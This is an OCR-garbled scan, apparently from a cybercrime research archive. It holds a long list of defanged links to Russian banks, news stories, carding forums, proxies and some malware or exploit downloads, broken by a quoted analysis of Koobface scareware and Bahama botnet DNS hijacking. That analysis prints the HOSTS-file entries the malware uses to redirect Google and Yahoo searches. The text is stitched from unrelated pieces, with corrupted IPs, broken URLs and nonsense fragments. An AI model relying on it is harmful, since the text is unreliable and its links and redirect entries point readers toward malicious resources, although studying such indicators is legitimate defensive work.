hxxp://www.dercred.narod.ru 
hxxp://www.derzhava.ru 
hxxp://www.deutschebank.ru 
hxxp://www.deutsche-bank.ru 
hxxp://www.devichnik.ru 
hxxp://www.devichnik.ru/forums/viewtopic.p...= %60Ils %60. %2527 
hxxp://www.devichnik.ru/forums/viewtopic.php?p=18457 &highlight= %2527. & #036 
hxxp://www.dhb.ru 
hxxp://www.dhs.gov/xoig/assets/mgmtrpts/OIG 08-95 Sep08.pdf 
hxxp://www.digitalbond.com/2012/01/19/project-basecamp-at-s4/ 
hxxp://www.digitalintelligence.com/products/freddi.. 
hxxp://www.digitalintelligence.com/products/freddie/ 
hxxp://www.digitalmoneyworld.com/fake-e-gold-bankrupt-release/ 

27895 


hxxp://www.dirty.ru/comments/23619 
hxxp://www.dirty.ru/comments/37023 
hxxp://www.d-link.ru/products/prodview.php?type=17 &amp 
hxxp://www.d-link.ru/products/wireless.php 
hxxp://www.dni.ru/news/showbiz/2006/3/9/78846.html 
hxxp://www.dni.ru/tech/2009/3/10/161259.html 
hxxp://www.dnsstuff.com/tools/aboutyou.ch 
hxxp://www.dnsstuff.com/tools/ip4r.ch?ip= 
hxxp://www.dnsstuff.com/tools/lookup.ch?name=rtsgroup.net &amp 
hxxp://www.documentcloud.org/documents/6821383-Maksim-Boiko.html 


hxxp://www.documentcloud.org/documents/7044253-Egor-Ilgorevich-Kriuchkov-crimi 
complaint.html 


hxxp://www.domaintools.com 

hxxp://www.dombank.ru 

hxxp://www.donaktivbank.ru 

hxxp://www.don-bank.ru 

hxxp://www.doncombank.ru 

hxxp://www.doninvest.ru 

hxxp://www.donkombank.ru 

hxxp://www.donteksbank.ru 
hxxp://www.dontr.ru/Environ/WebObjects/dontr.woa/2/wa/Main?textid=21807 
hxxp://www.dontr.ru/upload/Media/72345 _2.wmv 
hxxp://www.doris.ru 

hxxp://www.download.com/3000-2092 _4-10783721.html?tag=dl.2 
hxxp://www.dreams.ru/talk/read.php?f=3 &amp 
hxxp://www.dresdner.ru 

hxxp://www.dresdner-bank.ru 
hxxp://www.drive.ru/humour/2007/12/14/723256.html 
hxxp://www.drive.ru/images/lib/articles/additional/97079.jpeg 
hxxp://www.drive.ru/images/lib/articles/additional/97100.jpeg 
hxxp://www.drive.ru/images/lib/articles/additional/97132.jpeg 


hxxp://www.drivemc.ru/other/putin2006/putin2006.php?name=Vendors+ %3A %29 &amp 


hxxp://www.drkw.ru 


hxxp://www.drweb.com/ 


nal- 


hxxp://www.drweb.com/upload/a8601a8e66f6ff9a9c629c969482d292 1210059861 DDOCU- 


MENTSArticales PRDrWEB _Rustock _rus.pdf 
27896 


hxxp://www.dtb1.kirov.ru 
hxxp://www.dtors.org/papers/malicious-code-injection-via-dev-mem. pdf 
hxxp://www.dumpert.nl/mediabase/9385/a25cea93/index.html 


hxxp://www.dumpfbacke.de/cgi-bin/mdsme-ll/nph-spinnerproxy.cgi/111110A/http/w 
ww.google.de/ 


hxxp://www.dvbank.ru 
hxxp://www.dw-world.de/dw/article/O 
hxxp://www.eab.ru 
hxxp://www.ean66.ru/news/?id=32379 
hxxp://www.eastbridge.ru 
hxxp://www.east-tec.com/sanitizer/index.htm 
hxxp://www.easycash.ru 
hxxp://www.easycash.ru/ 
hxxp://www.e-avia.com/ 
hxxp://www.e-avia.ru/ 
hxxp://www.ebaclearing.eu 
hxxp://www.ebaychatter.com/the _chatter/trust safety _corner/index.html 


hxxp://www.ebookfree24.info/technical/kingpin-how-one-hacker-took-over-the-bi __Ilion-dollar- 
cybercrime-underground/ 


hxxp://www.ebsg.net/ 
hxxp://www.ecarlink.com/showroom/199/index?make=10 &amp 
hxxp://www.e-cartebleue.banquepopulaire.fr/ 
hxxp://www.ec-bank.ru 
hxxp://www.ecobank.perm.ru 
hxxp://www.ecobank.ru 
hxxp://www.eco-invest.ru 
hxxp://www.ecommerce-journal.com/articles/e gold _is_a_bankrupt what _is going on 
hxxp://www.ecommerce-journal.com/files/images/carto4ka.preview.jpg 
hxxp://www.econombank.ru 
hxxp://www.economiks.ru 
hxxp://www.ecoprombank.ru 
hxxp://www.ecraf.com/ 
hxxp://www.ecraf.com/nph-proxy.cgi/111110A/http/www.google.de/ 
hxxp://www.ecuator. biz 
hxxp://www.edbank.ru 
hxxp://www.edenwaith.com/downloads/permanenteraser.dmg 
27897 


hxxp://www.edge-security.com/metagoofil.php 
hxxp://www.efn.org/ carnesen/nph-proxy.cgi/ 
hxxp://www.e-gold.com/letter2.html 
hxxp://www.e-gold.com/unsecure/terms.htm 
hxxp://www.ehowa.com/swedishvsenglish.pps 
hxxp://www.eibank.ru 

hxxp://www.ekaterininsky.ru 

hxxp://www.elcomsoft.com/ 
hxxp://www.elcomsoft.com/news/268.html 
hxxp://www.electroname.com/story/3748 
hxxp://www.electrostim.org/ 

hxxp://www.elkabank.ru 
hxxp://www.ellf.ru/flashgames/24970-tjurma-v-norvegii-12-foto.html 
hxxp://www.ellf.ru/uploads/oldimages/1178763491 3d _printer.jpg 
hxxp://www.ellf.ru/uploads/oldimages/1185454220 1.jpg 
hxxp://www.ellf.ru/uploads/posts/2007-10/1193677290 c641a4ac4e452d0a827396eb9e729b5d.jpg 
hxxp://www.ellipsbank.ru 

hxxp://www.emb.ru 

hxxp://www.emb.spb.ru 

hxxp://www.emfy.com/page.php?id=15 
hxxp://www.employment.com.au/ 

hxxp://www.emspost.ru 
hxxp://www.emspost.ru/interactive/calculator of _cost/ 
hxxp://www.energobank.ru 

hxxp://www.energotransbank.com 
hxxp://www.energy.nsk.ru/1/2010 _1.htm 
hxxp://www.engadget.com/2008/09/23/live-from-t-mobiles-android-event-in-new-y ork-city/ 
hxxp://www.engelsbank.ru 

hxxp://www.e-norvik.ru 

hxxp://www.entuziastbank.ru 
hxxp://www.epic.org/privacy/carnivore/2003 _report.pdf 
hxxp://www.epochsystems.com/ 

hxxp://www.erbebank.com 

hxxp://www.erbebank.ru 


hxxp://www.ergobank.ru 
27898 


hxxp://www.esbank.ru 
hxxp://www.et.undp.org/index.php?option=com _mediaalert &id= 
hxxp://www.et.undp.org/index.php?option=com _pressrelease &id= 
hxxp://www.et.undp.org/index.php?option=com _speech &id= 
hxxp://www.etalkforum.com/member.php?action=getinfo &amp 
hxxp://www.etalon.ru 
hxxp://www.ethicalhacker.net/content/view/105/24/ 
hxxp://www.etnoshop.co.yu/images/proizvodi/slike/britve.jpg 
hxxp://www.etrust.ru 

hxxp://www.eubank.ru 

hxxp://www.euroalliance.ru 

hxxp://www.euroaxis.ru 

hxxp://www.eurocitybank.ru 

hxxp://www.eurocombank.ru 

hxxp://www.eurocredit.ru 

hxxp://www.euromet.ru 

hxxp://www.eurostd.ru 

hxxp://www.eurotreid.ru 

hxxp://www.evrazbank.ru 

hxxp://www.evrofinance.ru 
hxxp://www.example.com/index.php 
hxxp://www.example.com/main/articles/statya.html 
hxxp://www.example.com/main/search/stroka _poiska 
hxxp://www.example.com/script.asp?val= &gt 
hxxp://www.example.com/strokal1/stroka2 
hxxp://www.example.com/strokal1/stroka2/stroka3 
hxxp://www.exibank.ru 

hxxp://www.exile.ru/field _guide.html 
hxxp://www.eximbank.ru 

hxxp://www.expobank.ru 

hxxp://www.expocard.ru 

hxxp://www.expr.ru 

hxxp://www.express-bank.ru 

hxxp://www.express-trading.ru 


hxxp://www.extrobank.ru 


27899 


hxxp://www.ext-ua.com/test/184075-image001.gif 


hxxp://www.ey3.com/cgi-bin/nph-proxy.cgi/111110A/687474702f7777772e676f 
6f676c652e64652f 


hxxp://www.fahrwerke.de/images/fahrzeuge/toyota-celica-t20.jpg 
hxxp://www.fakeidscan.info 
hxxp://www.fantuning.ru/images/trash/pobeda/16.jpg 
hxxp://www.fantuning.ru/images/trash/pobeda/2.jpg 
hxxp://www.fantuning.ru/images/trash/pobeda/24.jpg 
hxxp://www.fantuning.ru/images/trash/pobeda/4.jpg 
hxxp://www.fags.org/rfcs/rfc1928.html 
hxxp://www.fasco-csc.com/works/bluechamber/index _e.php 
hxxp://www.fbi.gov/pressrel/pressrel07/botroast112907.htm 
hxxp://www.fbi.gov/pressrel/pressrel10/tridentbreach100110.htm 
hxxp://www.fbi.gov/wanted/cyber/evgeniy-mikhailovich-bogachev/view 
hxxp://www.fbid.ru 

hxxp://www.fdbnk.ru 

hxxp://www.fdcservers.net 
hxxp://www.fededirectory.frb.org/search.cfm 
hxxp://www.federalpost.ru/out/issue _19409.html 
hxxp://www.feib.ru 

hxxp://www.fiabank.ru 
hxxp://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf 
hxxp://www.filedownloads.pwp.blueyonder.co.uk/pspfo3408 Debug.exe 
hxxp://www.fileserve.com/file/mG6Mpe5 
hxxp://www.filesonic.com/file/52592257/fatal system _eror.rar 
hxxp://www.finambank.ru 

hxxp://www.finbank.ru 

hxxp://www.fincap.ru 

hxxp://www.fincombank.com/img/flash/f _bankomat.html 
hxxp://www.fincombank.com/img/flash/f _terminal.html 
hxxp://www.finprombank.ru 

hxxp://www.finsb.com 

hxxp://www.finsb.ru 

hxxp://www.finservicebank.com 

hxxp://www.finservicebank.ru 

hxxp://www.finstbank.ru 

27900 


hxxp://www.firstcallpaintball.com/index.php?main _page=product info &amp 
hxxp://www.firstcapital.ru 
hxxp://www.firstusa.com 
hxxp://www.fishki.lv/flash/childhood.swf 
hxxp://www.fishki.net/comment.php?id=19478 
hxxp://www.fishki.net/comment.php?id=39823 
hxxp://www.fishki.net/comment.php?id=4031 
hxxp://www.fishki.net/comment.php?id=4392 
hxxp://www.f-laboratory.com/carderplanet/index3c86.html?showtopic=41882 
hxxp://www.f-laboratory.com/carderplanet/index4a63.html?showtopic=41484 
hxxp://www.f-laboratory.com/carderplanet/indexe29e.html?showtopic=30835 
hxxp://www.florabank.ru 
hxxp://www.floranimal.ru 
hxxp://www.forabank.ru 
hxxp://www.forbank.alt.ru 
hxxp://www.foreignword.com/es/Tools/dictsrch _hp.asp:StringData 
hxxp://www.forexmarketgates.ru 
hxxp://www.forshtadt.ru 
hxxp://www.fortrade.ch/paranormal/html/gallery/temp/samayakrohotnaya/01.jpg 
hxxp://www.fortrade.ch/paranormal/html/gallery/temp/samayakrohotnaya/07.jpg 
hxxp://www.fortrade.ch/paranormal/html/gallery/temp/samayakrohotna ya/14.jpg 
hxxp://www.fortrade.ch/paranormal/html/gallery/temp/samayakrohotnaya/avas uper.jpg 
hxxp://www.fortrade.ch/paranormal/html/gallery/temp/samayakrohotnaya/South .jpg 
hxxp://www.fortrade.ch/paranormal/html/gallery/temp/samayakrohotnaya/Southpar k1.JPG 
hxxp://www.fortrade.ch/paranormal/html/gallery/temp/samayakrohotnaya/Southpar k2.JPG 
hxxp://www.forum.udaff.com/images/smilies/achtung. gif 
hxxp://www.forusbank.ru 
hxxp://www.foxnews.com/images/497121/0 61 zombies 320.jpg 
hxxp://www.fpkbank.ru 
hxxp://www.freecall.ru/eng/nd2/qu10/b02748306/ru15 738 
hxxp://www.freeproxy.ru/ru/free _proxy/faq/anti proxy.htm 
hxxp://www.freesmug.org/portableapps/adium/ 
hxxp://www.freesmug.org/portableapps/firefox 
hxxp://www.freesmug.org/portableapps/thunderbird/ 
hxxp://www.freetranslation.com/web.htm 

27901 


hxxp://www.freewebs.com/obnal/install.htm| 
hxxp://www.freewebs.com/obnal/ssimodule.cab 
hxxp://www.freewebs.com/obnal/ubs.jpg 
hxxp://www.from-ua.com/news/431ec49b40f50 

hxxp://www. frsirt.com/english/advisories/2007/4272 
hxxp://www.f-secure.com/weblog/archives/00001411.html 
hxxp://www.f-secure.com/weblog/archives/carderplanet index.htm 
hxxp://www.f-secure.com/weblog/archives/HupigonO1.jpg 
hxxp://www.f-secure.com/weblog/archives/Hupigon0O2.jpg 
hxxp://www.f-secure.com/weblog/archives/Hupigon03.jpg 
hxxp://www.ftc.gov/bcp/edu/microsites/idtheft/ 
hxxp://www.ftc.gov/os/2007/11/SynovateFinalReportIDTheft2006. pdf 
hxxp://www.fundservice.ru 
hxxp://www.funzor.net/upl/sep/3.14/1.jpeg 
hxxp://www.futbolka.com.ua/view/730/ 
hxxp://www.futbolka.com.ua/view/739/ 
hxxp://www.futbolka.com.ua/view/740/ 

hxxp://www.future.ru 

hxxp://www.gae.ucm.es/ padilla/extrawork/magexam1.html 
hxxp://www.gagarinbank.ru 

hxxp://www.garantia.nnov.ru 
hxxp://www.gauss2k.narod.ru/jab/lo.hAtm 
hxxp://www.gazbank.ru 
hxxp://www.gazeta.ru/news/lastnews/2007/08/17/n _1106341.shtml 
hxxp://www.gazeta.ru/news/lenta/2007/11/30/n _1147398.shtml 
hxxp://www.gazeta.ru/news/lenta/2008/01/30/n _1169554.shtml 
hxxp://www.gazeta.ru/news/lenta/2008/03/26/n _1197995.shtml 
hxxp://www.gazinv.ural.ru 

hxxp://www.gazneftbank.ru 

hxxp://www.gazprombank.ru 

hxxp://www.gazstroybank.ru 

hxxp://www.gbm.ru 

hxxp://www.gde24.ru/Default.aspx?0=1280 &amp 
hxxp://www.gebank.ru 
hxxp://www.geekpeaksoftware.com/ccount12/click.php?id=3 
27902 


Once the connection was also established by me at a later stage, data released in re- 
gard to [55]the New York Times malvertising attack once again revealed a connection between 
all campaigns - the very same domains used to serve the scareware, were also used in a 
blackhat SEO campaign which | analyzed a week before the incident took place. Basically, 
the [56]scareware pushed by the Koobface botnet, as well as the scareware pushed by 
the blackhat SEO campaigns maintained by the gangs is among the several propagation 
approaches used for the DNS records poisoning to take place: 


64.56. google.ae 
64.56. google.as 
64.56. google. at 
64.56. google. az 
64.56. google.ba 
64.56. google.be 
64.56. google.bg 
64.56. google.bs 
64.56. google.ca 
64.56. google.cd 
64.56. google.com.gh 
64.56. google.com.hk 
64.86. google.com.jm 
64.86. google.com.mx 
64.56. google.com.my 
64.56. google.com.na 
64.86. google.com.nf 
64.56. google.com.ng 
64.56. google.ch 
64.56. google.com.np 
64.56. google.com.pr 
64.56. google.com.qa 
64.56. google.com.sg 
64.56. google.com.tj 
64.56. google. com.tw 
64.56. google. dj 
64.56. google.de 
64.56. google. dk 
64.56. google.dm 
64.56. google.ee 
64.56. google. fi 
64.56. google.fm 
64.56. google. fr 
64.56. google. ge 
64.56. google.qg 
64.56. google.gm 
64.56. google. gr 
64.86. google. ht 


"However, in the case of the Bahama Botnet, this DNS translation method gets corrupted. 
The Bahama botnet malware causes the infected computer to mistranslate a domain name. 
Instead of translating “Google.com” as 74.125.155.99, an infected computer will translate it 
as 64.86.17.56. That number doesn’t represent any computer owned by Google. Instead, it 
represents a computer located in Canada. When a user with an infected machine performs a 
search on what they think is google.com, the query actually goes to the Canadian computer, 
which pulls real search results directly from Google, fiddles with them a bit, and displays them 
to the searcher. 
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Now the searcher is looking at a page that looks exactly like the Google search results 
page, but it’s not. A click on the apparently “organic” results will redirect as a paid click 
through several ad networks or parked domains — some complicit, some not. Regardless, 
cost per click (CPC) fees are generated, advertisers pay, and click fraud has occurred." 


The 64.86.17.56 mentioned is actually [57]AS30407 (Velcom), which has also been used in 
[58]recent campaigns. 


uavrl.com : 0 text/htm 


eezgbbh.xorg.pl | ch=2009-10-06_uavrl.com&ver=1afr=1ad=803 > text/htre 


text hin 
text/html 


90064 1 Se60928ac 158013001411.j5 text/javasc 


fist/al_hor.gt 


ISP and domain registrars have been notified, action should be taken shortly. What was 
particularly interesting to observe was scareware pushed by the Koobface botnet phon- 
ing back to its well known urodinam .net/8732489273.php domain, was also modifying 
the HOSTS file in the following way. Sample HOSTS modification of scareware (MD5: 
OxOFBF1A9F8E6E305138151440DA58B4F1) pushed by Koobface: 

89.149.210.109 www.google.com 

89.149.210.109 www.google.de 

89.149.210.109 www.google. fr 

89.149.210.109 www.google.co.uk 

89.149.210.109 www.google.com.br 

89.149.210.109 www.google. it 

89.149.210.109 www.google.es 

89.149.210.109 www.google.co.jp 

89.149.210.109 www.google.com.mx 

89.149.210.109 www.google.ca 

89.149.210.109 www.google.com.au 

89.149.210.109 www.google.n! 

89.149.210.109 www.google.co.za 

89.149.210.109 www.google.be 

89.149.210.109 www.google.gr 

89.149.210.109 www.google.at 

89.149.210.109 www.google.se 

89.149.210.109 www.google.ch 

89.149.210.109 www.google.pt 

89.149.210.109 www.google.dk 

89.149.210.109 www.google. fi 

89.149.210.109 www.google.ie 

89.149.210.109 www.google.no 

89.149.210.109 search.yahoo.com 

89.149.210.109 us.search.yahoo.com 

89.149.210.109 uk.search.yahoo.com 
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hxxp://www.musclecarclub.com/musclecars/dodge-charger/images/dodge-charger-19 69a.jpg 


hxxp://www. mv.org.ua/?news=9737 
hxxp://www.mvd.ru/news/show _106992/ 
hxxp://www.mvd.ru/news/show _108453/ 
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hxxp://www.mvdinform.ru/index.php?docid=4. &amp 
hxxp://www.mvdrb.ru/files/ 3180871.jpg 
hxxp://www.mvdrb.ru/files/ 3180968.jpg 
hxxp://www.mvdrb.ru/news.php?id=148 
hxxp://www.mxtoolbox.com 
hxxp://www.mybank-group.ru 
hxxp://www.mybank-nsk.ru 
hxxp://www.mycareer.com.au 
hxxp://www.myoffice.ru/albums/userpics/11272/thumb Black %20planet %20 01.jpg 
hxxp://www.my-proxy.com/show-what-ip 
hxxp://www.mytempdir.com/936293 


hxxp://www.nacion.com/2013-05-24/Sucesos/tico-detenido-en-espana-por-lavado-d e- 
dinero.aspx 


hxxp://www.nadb.ru 

hxxp://www.nag.ru/ 

hxxp://www.nalog.ru/inf deyat.html 
hxxp://www.namvd.ru/forum/profile.ph...0a602ff11b75ff 
hxxp://www.namvd.ru/forum/profile.php?mode=viewprofile &amp 
hxxp://www.naratbank.ru 

hxxp://www.narcred.ru 
hxxp://www.nashgorod.ru/forum/viewtopic.php?t=36261 
hxxp://www.natallia.ru/post _1211122934.html 
hxxp://www.natindbank.ru 
hxxp://www.nationmultimedia.com/2009/06/17/national/national _30105294.php 


hxxp://www.nationmultimedia.com/breakingnews/30105287/2-Russians-arrested-for - 
allegedly-stealing-info-vi 


hxxp://www.navigatorbank.ru 

hxxp://www.navoine.ru/forum/viewtopic.php?p=551 

hxxp://www.nbbank.ru 

hxxp://www.nbd.ru 

hxxp://www.nbdbank.ru 

hxxp://www.nbmc.ru 

hxxp://www.nch29.ru 

hxxp://www.ncjrs.gov/pdffiles1/nij/210798.pdf 

hxxp://www.ncorpbank.ru 

hxxp://www.ncr.com/documents/Personas %2071 %20Datasheet %20(US).pdf 
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hxxp://www.ncubank.ru 

hxxp://www.ndc-system.com/ 

hxxp://www.neal.ru 

hxxp://www.necklace.ru 

hxxp://www.nefteprom.com 

hxxp://www.negativepulse.com 
hxxp://www.neimanmarcus.com/products/mp/NMY6482 _mp.jpg 
hxxp://www.neopolis.ru 

hxxp://www.nero.ru/goods126.html 

hxxp://www.nerungribank.ru 
hxxp://www.networkassociates.com/ 
hxxp://www.networkworld.com/news/2009/112009-banks-on-watch-after-suspected.h tml 


hxxp://www.netzero.net/img/logo/hdr _Ig _n.gifhxxp://mail.google.com/mail/help/im- 
ages/logo.gifhxxp://wiredblogs.type pad.com/gadgets/mailcom.gif 


hxxp://www.nevada.org)/ 

hxxp://www.nevskybank.ru 

hxxp://www.newbank.ru 

hxxp://www.newizv.ru/lenta/76852/ 
hxxp://www.newslevel.ru/news/1800.htm| 
hxxp://www.newsru.co. il/israel/1 7mar2008/mosad311.html 
hxxp://www.newsru.com/crime/22feb2008/china _aferal0bn.html 
hxxp://www.newsru.com/russia/25aug2006/bankomat.html 
hxxp://www.newsru.com/russia/26jan2006/deda.html 
hxxp://www.newsru.com/world/09dec2004/pc.html 
hxxp://www.newsymbol.ru 

hxxp://www.nextsecurity.net/ 
hxxp://www.nexusdomain.org/cgiproxy/nph-proxy.pl 
hxxp://www.ng.ru/telecom/2007-06-05/20 _emoney.html 
hxxp://www.nico-bank.ru 
hxxp://www.niks.by/support/instruct/permeo/permeo.htm 
hxxp://www.nipbank.ru 
hxxp://www.nissan-4x4.ru/img/posts/13913.jpg 
hxxp://www.nix.ru/autocatalog/nb _hdd/221213 _22121.html 
hxxp://www.nix.ru/autocatalog/wis _lan/3243322 32433.html 
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Sample HOSTS modification of scareware (MD5: OxOFBF1A9F8E6E305138151440DA58B4F1) 
pushed by blackhat SEO: 

74.125.45.100 4-open-davinci.com 
74.125.45.100 securitysoftwarepayments.com 
74.125.45.100 privatesecuredpayments.com 
74.125.45.100 secure.privatesecuredpayments.com 
74.125.45.100 getantivirusplusnow.com 
74.125.45.100 secure-plus-payments.com 
74.125.45.100 www.getantivirusplusnow.com 
74.125.45.100 www.secure-plus-payments.com 
74.125.45.100 www.getavplusnow.com 
74.125.45.100 www.securesoftwarebill.com 
74.125.45.100 secure.paysecuresystem.com 
74.125.45.100 paysoftbillsolution.com 
64.86.16.97 google.ae 

64.86.16.97 google.as 

64.86.16.97 google.at 

64.86.16.97 google.az 

64.86.16.97 google.ba 

64.86.16.97 google.be 

64.86.16.97 google.bg 

64.86.16.97 google.bs 

64.86.16.97 google.ca 

64.86.16.97 google.cd 

64.86.16.97 google.com.gh 

64.86.16.97 google.com.hk 

64.86.16.97 google.com.jm 

64.86.16.97 google.com.mx 

64.86.16.97 google.com.my 

64.86.16.97 google.com.na 

64.86.16.97 google.com.nf 

64.86.16.97 google.com.ng 

64.86.16.97 google.ch 

64.86.16.97 google.com.np 

64.86.16.97 google.com.pr 

64.86.16.97 google.com.qa 

64.86.16.97 google.com.sg 

64.86.16.97 google.com.tj 

64.86.16.97 google.com.tw 

64.86.16.97 google.dj 

64.86.16.97 google.de 

64.86.16.97 google.dk 
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hxxp://www.nkcbank.ru 

hxxp://www.nkotrc.ru 

hxxp://www.nmb.ru 

hxxp://www.nmbank.ru 

hxxp://www.nnm.ru/filez/crazy-frog.swf 
hxxp://www.nnm.ru/imagez/gallery/doci/lux/luxter-1145905006 i 5114 full.jpg 
hxxp://www.nnm.ru/imagez/gallery/nhumor/humor _von _dimy4-1124703573 i 8497 full.jpg 
hxxp://www.nnm.ru/imagez/gallery/index/1126254515 i 1004.jpg 
hxxp://www.nnm.ru/imagez/gallery/index/1147033515 i 9885 full.jpg 
hxxp://www.nod32.com/ 

hxxp://www.nokia.com/nokia/O 

hxxp://www.nokia.com/nseries/ 

hxxp://www.nokss.ru 

hxxp://www.nomos.ru 

hxxp://www.nomos-factor.ru 

hxxp://www.noptrix.net/tmp/skype _linux.ogv 

hxxp://www.noptrix.net/tmp/skype _win7.avi 

hxxp://www.noptrix.net/tmp/skype _winxp.ogv 
hxxp://www.noptrix.net/tmp/skype _xss.png 

hxxp://www.norman.com/ 
hxxp://www.northeastfraudforum.co.uk/images/generated/Lebanese %20Loop.jpg 0 0.jpg 
hxxp://www.norvikbank.ru 

hxxp://www.nota-bank.ru 

hxxp://www.novabank.ru 

hxxp://www.novahovcb.ru 

hxxp://www.novayagazeta.ru/news/99000.html 

hxxp://www.novikom.ru 


hxxp://www.novinky.cz/krimi/198068-ceska-policie-chytila-belorusa-hledaneho-f bi-kvuli- 
kyberzlocinu.html 


hxxp://www.novobank.velikiynovgorod.ru 
hxxp://www.novokib.ru 
hxxp://www.novonews.|v/news/2007/07/16/crime/022199.html 
hxxp://www.novonews.|v/news/2007/10/23/crime/027631.html 
hxxp://www.npbank.ru 
hxxp://www.npokrovbank.ru 
hxxp://www.npsb.ru 
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hxxp://www.nr2.ru/pmr/162641.html 

hxxp://www.nrb.ru 

hxxp://www.nrbank.ru 

hxxp://www.nrbspb.ru 
hxxp://www.nrs.com/news/crim/usa/171007 _165837 _74892.html 
hxxp://www.nsbank.ru 

hxxp://www.ns-bank.ru 

hxxp://www.nsd.ru/tmp/chel _i _zakon hackers 640x480.avi 
hxxp://www.nskbl.ru 

hxxp://www.nstbank.ru 

hxxp://www.ntb.ru 

hxxp://www.ntv.ru/novosti/197178/ 
hxxp://www.ntv.ru/novosti/202085/ 
hxxp://www.nullcode.com.ar/ncs/crash/nsloo.htm 
hxxp://www.nusphere.com/products/nucoder.htm?/ 
hxxp://www.nvkbank.ru 

hxxp://www.nwib.spb.ru 


hxxp://www.nydailynews.com/news/crime _file/2007/08/17/2007-08-17 cops _bust _idtheft 
_scam that targets _bill.hAtml 
hxxp://www.nydailynews.com/new-york/cops-nab-4-bungling-suspects-manhattan-atm- fraud- 
article-1.1297434 #ixzz2QS8HYbVc 


hxxp://www.nydailynews.com/ny _local/brooklyn/2008/03/06/2008-03-06 two _brooklyn_men 
_ripped _off 5m __from _atms.html 


hxxp://www.nypost.com/p/news/local/queens/credit _card _mega _wipe _vakkue- 
cYq3XdWMjfccK93K #ixzzlaALFHVbN 
hxxp://www.nytimes.com/2006/11/03/world/middleeast/O3documents.html? hp 
&ex=1162616400 &en=8326da2ccc77699e &ei=5094 &partner=homepage 
hxxp://www.nytimes.com/2006/12/20/business/worldbusiness/20pump.html? _r=1 


&oref=slogin 
hxxp://www.nytimes.com/2010/08/24/business/global/24cyber.html 
hxxp://www.nz.ru 

hxxp://www.nzpb.ru 
hxxp://www.obdev.at/products/littlesnitch/download.html 
hxxp://www.obibank.ru 

hxxp://www.obr1016.ru 

hxxp://www.obrbank.ru 

hxxp://www.oceanbank.ru 
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hxxp://www.oclock.info/vernisage/gallery/galleryviewer.php?tid=194 &amp 
hxxp://www.odinbank.ru 
hxxp://www.offensive-security.com/Oday/iesploit-vista.rar 
hxxp://www.officedesigns.com/product...e middle _aeron 


hxxp://www.officedesigns.com/product-exec/product _id/313?hs340=banner _home 
_middle _aeron 


hxxp://www.offshore.su/index.php?action=fullnews &amp 
hxxp://www.ogbank.ru 

hxxp://www.okbank.ru 

hxxp://www.oksky.ru 

hxxp://www.olabank.ru 

hxxp://www.olb.ru 

hxxp://www.oldbank.ru 

hxxp://www.oldkreml.ru 

hxxp://www.olmabank.ru 
hxxp://www.omegawatches.com/index.php?id=318 &amp 
hxxp://www.omskbank.ru 

hxxp://www.onlinebroker.ru 
hxxp://www.onlinepokerinfo.ru/poker-rules _texas-holdem 
hxxp://www.onliner.by/test/gsm/nokia _gold/020762.jpg 
hxxp://www.onliner.by/test/gsm/nokia _gold/020763.jpg 
hxxp://www.onliner.by/test/gsm/nokia _gold/020771.jpg 
hxxp://www.onliner.ru/test/gsm/nokia _gold/ 
hxxp://www.onlinewahn.de/generator/ 
hxxp://www.opennet.ru/opennews/art.shtml?num=20949 
hxxp://www.opennet.ru/opennews/art.shtml?num=33487 
hxxp://www.opennet.ru/opennews/art.shtml?num=39881 
hxxp://www.opennet.ru/opennews/art.shtml?num=40667 
hxxp://www.openvas.org/announcement-openvas-2.html 
hxxp://www.openwall.com/john/ 
hxxp://www.opm.gov/Operating Status Schedules/fedhol/2009.asp 
hxxp://www.opmbank.ru 

hxxp://www.optbank.ru 
hxxp://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html 
hxxp://www.orafaq.com/node/30 


hxxp://www.orbank.ru 


_Page 
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hxxp://www.orgbank.ru 
hxxp://www.orlandosentinel.com/media/photo/2007-08/31942042.jpg 
hxxp://www.ors.ru 

hxxp://www.orskbank.ru 

hxxp://www.osetia.ru/ bank 

hxxp://www.oskolbank.ru 

hxxp://www.osp.ru 

hxxp://www.otpbank.ru 
hxxp://www.overclockers.ru/softnews/19569.shtml 
hxxp://www.owasp.org/index.php/Top _10 2007-A2 #Protection 
hxxp://www.panasenko.ru 

hxxp://www.paritet.com 

hxxp://www. pattayadailynews.com/shownews.php?IDNEWS=0000010528 
hxxp://www. pattayadailynews.com/shownews.php?IDNEWS=0000010689 
hxxp://www.pattayadailynews.com/shownews.php?IDNEWS=0000010908 
hxxp://www.pax.web.ur.ru/smile.html 
hxxp://www.paxfly.com/obrashenie.mp3 

hxxp://www.pay.is.ru/isb4/ 

hxxp://www.pay.uralsib.ru 

hxxp://www. payback.de/ 

hxxp://www.payment.ru 
hxxp://www.pc-edv.at/cgi-bin/cgiproxy/nph-proxy.p!l 
hxxp://www.pchbank.ru 

hxxp://www.pc-help.org/obscure.htm 

hxxp://www.pchrb.ru 
hxxp://www.pci-portal.com/events/event-info/pci-tallinn-09 
hxxp://www.pci-portal.com/lang-en/events/event-info/pci-tallinn-09/registration 
hxxp://www.pcisecuritystandards.org/ 
hxxp://www.pctools.com/guides/registry/detail/280/ 
hxxp://www.pcweek.ru/themes/detail.php?ID=124425 
hxxp://www.pcweek.ru/themes/detail.php?ID=124603 
hxxp://www.pcworld.com/article/id 

hxxp://www. peacehall.com/news/gb/china/2004/12/200412130343.shtml 
hxxp://www.peb.ru 
hxxp://www.peoples.ru/state/criminal/manyak/chickotilo/chikatilo _3.jpg 
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hxxp://www.pereriv.ru/wp-content/uploads/2007/02/html for food.thumbnail.jpg 
hxxp://www.pervbank.ru 
hxxp://www.pervobank.com 
hxxp://www.pervobank.ru 
hxxp://www.petroffbank.ru 
hxxp://www.petrovka.ua/product.php?code=38420 
hxxp://www.pfsbank.ru 
hxxp://www.pgbt.ru 
hxxp://www.pgp.com/products/mobile/ 
hxxp://www.pgpi.org/products/pgpdisk/ 
hxxp://www.phoronix.com/scan.php?page=article &item=869 &num=1 
hxxp://www.phoronix.com/scan.php?page=article &item=phoenix hyperspace &num=1 
hxxp://www.photoduck.com/gphotos.aspx?gid=1389 
hxxp://www.php.net/gzcompress 
hxxp://www.pib.ru 
hxxp://www.pibank.ru 
hxxp://www.pinnaclesports.com/ 
hxxp://www.pirbank.ru 
hxxp://www.pkb.ru 
hxxp://www.pkbank.ru 
hxxp://www.planearium2.de/flash/spstudio.html 
hxxp://www.planetsky.com/ 
hxxp://www.planetwatches.co.uk/Emporio _Arm...tch ARO126.html 
hxxp://www.planetwatches.co.uk/Emporio Armani Gents Watch _AR0O126.html 
hxxp://www.platezh.ru 
hxxp://www.platina.ru 
hxxp://www.plugnpay.com/ 
